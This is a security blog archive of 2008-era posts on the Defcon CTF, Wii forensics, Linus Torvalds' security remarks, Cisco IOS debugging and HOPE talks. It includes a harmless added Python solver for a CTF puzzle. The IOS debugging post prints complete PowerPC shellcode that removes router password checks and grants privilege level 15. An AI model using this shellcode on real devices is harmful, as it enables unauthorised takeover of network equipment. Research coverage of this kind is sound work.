November 23rd, 2014

Defcon 2008 CTF Update

1@stPlace has posted an update to their 2008 Defcon CTF page that includes all of the binaries from the CTF (20-some different binaries in all) as well as the Shakespeare Challenge I mentioned in the last post. Time to break out the debuggers. :)

PS. Thanks to Doc Brown for pointing this out for me. :)

Wii Forensics

Here’s a random white-paper of the day for you. It’s a paper on the Forensic Investigation of the Nintendo Wii. I was both interested and amused to find that some real forensics work has been done on the Wii. Compared to the XBox and the PS3, it doesn’t look like there is a whole lot of easily attainable forensic evidence on a Wii. According to the paper this is mostly due to the lack of an internal hard drive, the use of on-board memory, and a proprietary OS/file system.

He talks about the built-in system logging (play statistics that are held in the mail system), internet browsing & shopping, the Mail and wireless components, and briefly touches on mod-chips as well. He gives a process for performing the analysis and walks through each step. One random non-tech thing he mentions is a case where a man catches his wife cheating on him by finding and examining a Mii character on his Wii.

I found the article on the website for the Small Scale Digital Device Forensic Journal (SSDDFJ). It looks like they have a few different papers on forensics for consumer-electronic type devices.

New Tools From Defcon

Here’s a list of the new tools released at Defcon this year: 21 different tools in all, and it looks like some interesting stuff. The CD that was distributed to Defcon attendees has also been published.

Via hack-a-day

Linus Torvalds vs. Security

OK — I wasn’t going to post anything about this thread until I saw this quote from Linus Torvalds:

I think the OpenBSD crowd is a bunch of masturbating monkeys, in
that they make such a big deal about concentrating on security to the
point where they pretty much admit that nothing else matters to them.

It’s already been heavily covered elsewhere, but Linus Torvalds has made some interesting and humorous comments about the security community, and for some reason also calls out OpenBSD directly. Outside of these comments, I usually consider Mr. Torvalds a generally pragmatic fellow. He now seems to distance himself from both the full-disclosure and the non-disclosure camps. Here’s his quote on the topic:

“Both camps are whoring themselves out for their own reasons, and both camps point fingers at each other as a way to cement their own reason for existence,”

I do agree with some of his statements, but I definitely wouldn’t consider security bugs and “normal” bugs the same because of the additional exposure a security vulnerability allows for.

Defcon 2008 CTF Write-up

1@stPlace recently posted a write-up on the Defcon CTF competition. There’s not too much detail on the specific contests that were run, but it’s good to get some insight into the competition. Also of note is a blog post from atlas, the team captain for 1@stPlace, talking a bit more about the competition.

I’ve heard a bit of speculation about how skewl of root was able to dominate the competition so thoroughly. Here’s an interesting quote from atlas on the topic:

This year, Sk3wl multiplied both the evi1 as well as the technical awe of our attack from last year, instead, denying any of our teams the ability to score. How they did this, I can’t say specifically, but let’s just say they pwned the services themselves and made their own version of a “service-r00tkit”, modifying information to either prevent us from gaining shell on the box or changing the contents of keys so we received bogus keys and our overwrites were dorked as well.

Something else I found pretty interesting was a blurb from atlas on a pretty interesting sounding challenge:

Kenshoto provided a text file with all of shakespeare’s works. our job was to find the longest run of bytes which convert to x86 opcodes which don’t touch memory.

If anyone else knows about other posts, or has other information on either the CTF or openCTF challenges at Defcon, I’d love to hear about them.

The scoreboard @ CTF:
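The Shakespeare challenge atlas describes above (find the longest run of bytes that decode to x86 instructions not touching memory) is a nice small search problem. What follows is an added example, not code from the original post or from 1@stPlace: it decodes only a small, conservative subset of 32-bit x86 instruction forms (inc/dec, a handful of one-byte instructions, immediate-to-accumulator and mov-immediate forms, and ModRM forms whose operand is register-direct), treats everything else, including push/pop, branches, prefixes and any memory operand, as the end of a run, and then finds the longest run with a single right-to-left pass so each offset is decoded once. A real solution needs a full decoder; the search part is the same. The sample text is constructed, not taken from the challenge file.

```python
# Added example (not from the original post, 1@stPlace or atlas): a simplified
# "Shakespeare challenge" search. Only a conservative subset of 32-bit x86
# instruction forms that never touch memory is recognised; anything outside
# it ends a run. The sample text at the bottom is constructed.

# One-byte, register/flag-only instructions outside the 0x40-0x4F inc/dec block.
ONE_BYTE = {0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97,  # nop, xchg eax,reg
            0x98, 0x99,                                       # cwde, cdq
            0xF5, 0xF8, 0xF9, 0xFC, 0xFD}                     # cmc, clc, stc, cld, std

# ModRM-form opcodes, mapped to the size of the immediate that follows the ModRM byte.
MODRM_IMM = {0x80: 1, 0x83: 1, 0x81: 4, 0xC0: 1, 0xC1: 1}     # group 1 / shift imm8
for _op in (0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B,   # test, xchg, mov
            0xD0, 0xD1, 0xD2, 0xD3):                          # shift by 1 / by CL
    MODRM_IMM[_op] = 0
for _op in range(0x00, 0x40):          # add/or/adc/sbb/and/sub/xor/cmp r/m,r and r,r/m
    if _op & 7 <= 3:
        MODRM_IMM[_op] = 0


def instr_len(buf, i):
    """Length of the memory-free instruction starting at buf[i], or 0 if there is
    none (unknown opcode, memory operand, or truncated by the end of the buffer)."""
    n = len(buf)
    op = buf[i]
    if 0x40 <= op <= 0x4F or op in ONE_BYTE:                   # inc/dec r32 and friends
        return 1
    if (op < 0x40 and op & 7 == 4) or 0xB0 <= op <= 0xB7:      # op al,imm8 / mov r8,imm8
        return 2 if i + 2 <= n else 0
    if (op < 0x40 and op & 7 == 5) or 0xB8 <= op <= 0xBF:      # op eax,imm32 / mov r32,imm32
        return 5 if i + 5 <= n else 0
    if op in MODRM_IMM and i + 1 < n:
        modrm = buf[i + 1]
        if modrm >> 6 != 3:                                    # mod != 11b: memory operand
            return 0
        length = 2 + MODRM_IMM[op]
        return length if i + length <= n else 0
    return 0


def longest_run(buf):
    """Return (start, byte_length, instruction_count) of the longest run of
    consecutive memory-free instructions. Computed right to left: the run from
    offset i is the instruction at i plus the run starting where it ends."""
    n = len(buf)
    run_bytes = [0] * (n + 1)
    run_count = [0] * (n + 1)
    for i in range(n - 1, -1, -1):
        length = instr_len(buf, i)
        if length:
            run_bytes[i] = length + run_bytes[i + length]
            run_count[i] = 1 + run_count[i + length]
    if n == 0:
        return 0, 0, 0
    start = max(range(n), key=lambda i: run_bytes[i])          # first offset on ties
    return start, run_bytes[start], run_count[start]


def instructions(buf, start):
    """Split the run beginning at start into the byte strings of its instructions."""
    out = []
    i = start
    while i < len(buf):
        length = instr_len(buf, i)
        if not length:
            break
        out.append(bytes(buf[i:i + length]))
        i += length
    return out


# Constructed sample text (not from the challenge file).
SAMPLE = b"HENRY V: O FOR A MUSE OF FIRE, 4 LADS"

if __name__ == "__main__":
    start, nbytes, count = longest_run(SAMPLE)
    print(f"longest run: offset {start}, {nbytes} bytes, {count} instructions")
    for chunk in instructions(SAMPLE, start):
        print("  ", chunk.hex(" "), repr(chunk))
```

On the sample, the winner is the 8-byte run starting at "E, 4 LAD": the capitals A-O are inc/dec, while "," and "4" become sub al,imm8 and xor al,imm8 with the following space as their immediate. Plain ASCII never yields a ModRM byte with mod=11b, so in real text the ModRM forms only matter for bytes above 0x7F, which is exactly why a full decoder (and the raw bytes of the file, not just the letters) matter for the real challenge.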

More IOS shellcode

It looks like more shellcode has been released for IOS at BlackHat this year. Looks interesting.

Following our Cisco IOS shell code presentation at Blackhat Vegas 2008,
IRM has decided to release three variants of the IOS shell codes
discussed in the presentation. Following are the payloads that can be
used as both code execution based payloads and runtime memory resident
backdoors within IOS:

* Password protected bind shell

* Connect Back Shell

* Two byte overwrite bind shell

Step by Step Debugging Cisco IOS

This is kinda cool — I didn’t know that you could do this directly with GDB. Andy Davis has posted step by step instructions for debugging Cisco IOS with GDB. He’s done some other pretty interesting things lately including posting a remote exploit of IOS, and as a follow-up to the exploit he posted information on how his IOS shellcode works.

Other than a minor gdb patch and a couple of idiosyncrasies in the debugging process (you have to manually replace the instructions overwritten by breakpoint interrupts), from his instructions it looks pretty straightforward to do. I’m not sure of the details of how it’s able to attach to the kernel, but I’d like to try it out sometime. I wonder if some of this info will spur other security people to do more IOS research.

Andy’s IOS shellcode:

# PowerPC, GNU as syntax. The @ha/@l relocation suffixes on the symbol names
# were lost in the post's formatting and are restored here; the addresses and
# offsets are the ones given in the post.
.equ vty_info, 0x8182da60    # contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c

lis   4, vty_info@ha
la    4, vty_info@l(4)
xor   8, 8, 8                # clear r8
lwzx  7, 4, 8                # get pointer to VTY info structure
stw   8, 372(7)              # write zero to first offset to remove
                             # the requirement to enter a password
subi  8, 8, 1                # set r8 to be 0xffffffff
addi  7, 7, 233              # add second offset in two steps to
                             # avoid nulls in the shellcode
stw   8, 1226(7)             # write 0xffffffff to second offset to
                             # priv escalate to level 15
                             # (technically this should be 0xff100000
                             # but 0xffffffff works and is more efficient)
mr    3, 8                   # use 0xffffffff as a parameter
                             # to pass to terminate()
lis   4, terminate@ha
la    4, terminate@l(4)
mtctr 4
bctr                         # terminate "this process"

Last Hope Videos Posted

For others like me who weren’t able to attend The Last Hope this year in NYC, (most of) the videos have been posted as torrents. I’m pretty psyched about this since I’ve heard a lot of good things about the talks there. I haven’t been to a HOPE since HOPE2k, but I really enjoyed it then, and it seemed to have a different flavor of talks and crowd compared to the usual cons. I see a few interesting looking talks on some things like biohacking, botnets, the debian openssl bug, virtualization, and the PLA among other things. I also heard that some tools were released for the “cold boot” memory grabbing, disk encryption key snarfing hack that was all the rage a few months back.

Anyone have suggestions for their favorite talks of HOPE?
